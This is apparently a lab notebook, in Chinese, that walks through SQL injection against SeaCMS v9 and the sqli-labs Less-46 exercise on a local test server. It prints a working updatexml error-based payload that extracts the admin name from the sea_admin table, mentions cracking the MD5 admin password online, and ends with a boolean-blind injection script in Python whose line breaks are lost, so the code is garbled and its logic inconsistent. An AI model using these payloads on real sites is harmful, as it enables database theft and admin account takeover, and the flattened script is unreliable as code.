海洋cmsv9

1，我们拿到海洋cmsv9源码分析发现注入点，$rlist

2，seacms开源，可以知道seacmsv9系统数据库（mysql）为seacms，存放管理员账号的表为
sea_admin，表中存放管理员姓名的字段为name，存放管理员密码的字段为password

经过源码分析，使用以下语句注入（limit避免管理员有多个，导致SQL语句报错）：
127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
第一次尝试：

我们发现注入并没有成功

接下来我们在数据库查看表的情况

我们发现sea_comment中并没有数据所以并没有回显

那我们就添加数据

insert into sea_comment(id,uid,v_id,typeid,username,ip,ischeck,dtime,msg,m_type,reply,agree,anti,pic,vote) values (1,2,3,4,'hyd1','192,168,106,133',1,01,'sample comment',0,0,0,0,'exam01.jpg',0),(5,6,7,8,'hyd2','192,168,106,134',2,02,'sample comment',0,0,0,0,'exam02.jpg',0);

然后我们重新进行注入

发现密码是通过MD5加密了的

所以就到md5在线解密破解,md5解密加密这个网站解密

oeder by

我们发现俩次username中发现第6行不一样，所以我们可以利用这里进行注入

import requests
from bs4 import BeautifulSoupdef getDatabase(url):dataname = ''for i in range(1, 20):  # 检查每个字符位置for j in range(32,127):payload = "if(ascii(substr(database(),%d,1))=%d,username,password) -- " % (i, j)res = {"sort": payload}r = requests.get(url, params=res)# 检查返回内容，使用 BeautifulSoup 解析 HTMLsoup = BeautifulSoup(r.text, 'html.parser')# 提取密码列第6行password_row = soup.find_all('tr')[6]  # 第6行（索引为5）password_column = password_row.find_all('td')[1]  # 假设密码在第二列# 如果返回的是 'crappy'，则跳过该字符#print(password_column.text.strip())if password_column.text.strip() == 'secure':#print(1)  # 如果是 crapp，就跳过当前字符w=1else:# 如果没有找到有效字符，或者跳过该字符，则继续下一个字符dataname += chr(j)  # 将识别到的字符添加到数据库名称print(dataname)  # 打印当前已经找到的字符if __name__ == '__main__':url = 'http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php'getDatabase(url)